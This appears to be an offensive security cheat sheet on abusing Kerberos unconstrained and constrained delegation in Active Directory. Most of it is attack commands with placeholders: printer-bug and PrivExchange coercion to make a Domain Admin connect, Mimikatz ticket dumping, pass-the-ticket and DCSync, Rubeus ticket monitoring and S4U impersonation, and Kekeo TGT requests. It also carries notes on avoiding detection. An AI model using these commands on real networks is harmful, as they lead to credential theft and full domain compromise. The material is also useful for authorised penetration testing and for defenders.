Delegation
Unconstrained delegationβ
info
Impersonate users connecting to service to any Kerberos service.
Requirementsβ
- Control over an account with unconstrained delegation privileges
- A way to connect victim users/computers to us
Make a DA connect to usβ
info
Chain with the print server bug or privexchange bug to get Domain Administrator.
.\SpoolSample.exe <DC> <compromised_host>
python printerbug.py <VICTIM>/<user>:<password>@<dc.internal.dom> <client_share>
python privexchange.py -u <user> -p <password> -ah <evil.internal.dom> <exchange.internal.dom> -d <internal.dom>
Mimikatzβ
OPCSEC UNSAFE
It touches LSASS!
The user <COMPUTER$> should get the TGT
sekurlsa::tickets
kerberos::ptt ticket.kirbi
lsadump::dcsync /domain:<domain> /user:<user>
Rubeusβ
Opsec safe
It uses LSACallAuthenticationPackage with a GetSystem token elevation approach, but LSASS isnβt touched!
Rubeus.exe dump
Rubeus.exe monitor [/interval:SECONDS] [/filteruser:USER]
Constrained delegationβ
info
Impersonate authenticated users connecting to service to specific Kerberos services on servers.
Kekeoβ
Request TGT
tgt::ask /user:<VULN_ACCOUNT> /domain:<DOMAIN> /rc4:<RC4key>
tgt::ask /user:<VULN_ACCOUNT> /domain:<DOMAIN> /aes:<AESkey>
Pass-the-Ticket via s4u
tgs::s4u /user:<IMPERSONATED_USER>@<domain> /service:<DELEGATED_SVC>/<FQDN_MACHINE> /ptt /tgt:<TGT_FILE>
Rubeusβ
Pass-the-Ticket via s4u
Rubeus.exe s4u /user:<user_with delegation> /domain:<DOMAIN> /rc4:<RC4key> /impersonateuser:<user_impersonated> /msdsspn:"<delegated_svc>/<FQDN_machine>" /ptt
Constrained delegation with Protocol Transitionβ
info
Impersonate any user to specific Kerberos services on servers. Also called 'Kerberos magic'.
Resource-based Constrained delegationβ
info
Enables delegation configured on the resource instead on the account